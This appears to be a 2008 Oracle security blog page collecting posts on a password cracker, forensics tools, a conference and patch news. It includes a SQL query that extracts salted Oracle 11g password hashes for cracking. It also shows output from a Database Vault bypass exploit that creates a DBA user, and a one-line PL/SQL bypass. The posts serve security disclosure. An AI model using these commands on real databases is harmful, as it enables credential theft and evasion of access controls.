GSAuditor – Fastest Oracle 11g password cracker (AFAIK)

Dezember 7th, 2008

Danny boy from evilfingers.com informed me that his tool gsauditor now supports Oracle 11g passwords (+ many other variants of SHA-1). GSAuditor is really fast and with more than 6 million password hashes per second (Core2Quad Q6600 2.4 GHz, Vista 64) it’s currently the fastest Oracle 11g password cracker I know.  At the moment GSAuditor is not supporting multiple threads but Danny boy is working on it. The number will increase by 4 (=more than 20 mill hashes/second).

GSAuditor - unsuccessful crack GSAuditor - successful crack

To extract the password hashes from Oracle 11g you can use the following SQL query to retrieve the Oracle password hash + salt from the table sys.user$:

SQL> set linesize 120
SQL> select ‚gsauditor -binary -set:?d -append -salt:’||substr(u.spare4,43,20)||“||substr(u.spare4,3,40)||‘ ‚ from sys.user$ u where u.type#>0 and length(spare4) =62;

Posted in Oracle Security, passwords, Tools | 1 Comment »

DOAG 2008 is over

Dezember 5th, 2008

Just back from the DOAG 2008 conference. Nearly 2000 attendees came to Nürnberg, Germany. Together with Sentrigo we had a booth at the conference and presented our products like Repscan or Hedgehog and services (Audits, Trainings, …).

DOAG Booth

I gave a presentation „Best of Oracle Security 2008“ and Aviv Pode talked about „Hacking and protecting the Oracle database“.

Aviv Pode

Today I also uploaded the presentations from Polish Oracle User Group (PLOUG),  Deepsec 2008 in Vienna and the iSafe 2008  Conference in Dubai.

Posted in Sentrigo | No Comments »

David Litchfield has published a whitepaper on Oracle forensics

November 27th, 2008

David Litchfield has posted a new whitepaper „Using the Oracle System Change Number in Forensic Investigations„. He published also 2 tools called oratime and orablock. Oratime is converting a SCN to a timestamp. 

C:\oratools>oratime 671406483

21/11/2008 21:48:03

 

 The second tool from the whitepaper „orablock“ can extract data from a data block.

 

C:\cadfile>orablock

Orablock v1.0

(c) David Litchfield

(david@davidlitchfield.com)

-h (show help)

-f data_file (required)

-c column_template

-z block_size (default 8192)

-o object_id

-b block_number

-s seperator (default newline)

-a action

Actions are:

A DUMPALL

D SHOWDELETED

O DUMPNOTVIAOFFSETS

S SHOWDELETEDNOTVIAOFFSETS

C DUMPSCNS

 

Posted in David Litchfield, Forensics | No Comments »

Oracle Database Vault Privilege Escalation Exploit published

November 21st, 2008

Few days ago Jakub Wartak has posted an exploit showing how to switch DV off on his blog.Jakub describes that he was surprised that Data Vault does not protect from OS side. That’s something many people are not aware of. Oracle Data Vault is not designed to protect from normal DBAs (with OS access).Here the usage of his exploit:

[oracle@xeno ora_dv_mem_off]$ !gcc
gcc -Wall ora_dv_mem_off.c -o ora_dv_mem_off -lbfd -liberty
ora_dv_mem_off.c: In function ‘locate_dv_func’:
ora_dv_mem_off.c:92: warning: initialization discards qualifiers from pointer
target type
ora_dv_mem_off.c:93: warning: initialization makes pointer from integer
without a cast

[oracle@xeno ora_dv_mem_off]$ ./ora_dv_mem_off
[17035] starting to trace sqlplus process (17036)
[***] NOW TYPE IN SQLPLUS: conn / as sysdba
[17035] execve() syscall in 17036

SQL*Plus: Release 10.2.0.3.0 – Production on Wed Feb 27 18:56:55 2008

Copyright (c) 1982, 2006, Oracle.  All Rights Reserved.

SQL> conn / as sysdba
[17035] clone() syscall in 17036, tracing orapid=17037
[17035] execve() syscall in 17037,
[17035] symbol “kzvtins” at 0xb185820
[***] sucessfuly validated function, DatabaseVault=1
[***] attempting to rewrite memory at 0xb185824
Connected.
SQL> create user god identified by abc;

User created.

SQL> grant dba,dv_admin,dv_owner,connect,resource to god;

Grant succeeded. 

 

Here is another (easier) way to bypass Data Vault without installing/compiling software. I found this issue a few months ago (in Oracle 11.1.0.6). After contacting secalert they told me that this issue was already fixed in Oracle CPU July 2008 (but not documented):

— run as user with DBA privleges 

SQL>  exec sys.kupp$proc.change_user(‚DVA‘);

PL/SQL procedure successfully completed. 

 

Posted in Oracle Security | No Comments »

Oracle Critical Patch Update October 2008 is out

Oktober 14th, 2008

Oracle just released the CPU for October 2008. This time Oracle fixed 36 security bugs across all products. Oracle recommends to apply this CPU with the following words

„Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply fixes as soon as possible.“

The credits are going to the usual suspects: Esteban,  Joxean, Pete, Slavik, Amichai plus a few new people like Chris Valasek, Jack Kanter, Tony Fogarty, Guy.

Oracle fixed 4 of my vulnerabilities with this CPU. Some of my issues were reported in 2005…

  • SQL INJECTION IN UPGRADE SCRIPT EXFEAPVS.SQL (CVE-2008-3980)
  • OLAP_USER HAS CREATE PUBLIC SYNONYM PRIVILEGE (CVE-2008-2624)
  • jdeveloper: plaintext password in IDEConnections.xml (CVE-2008-2588)
  • SHUTDOWN ANY UNPROTECTED TNS LISTENER VIA REPORTS SERVLET (CVE-2008-2619)

I will release advisories within the next few days.

Posted in Oracle Security | No Comments »

« Older Entries
Newer Entries »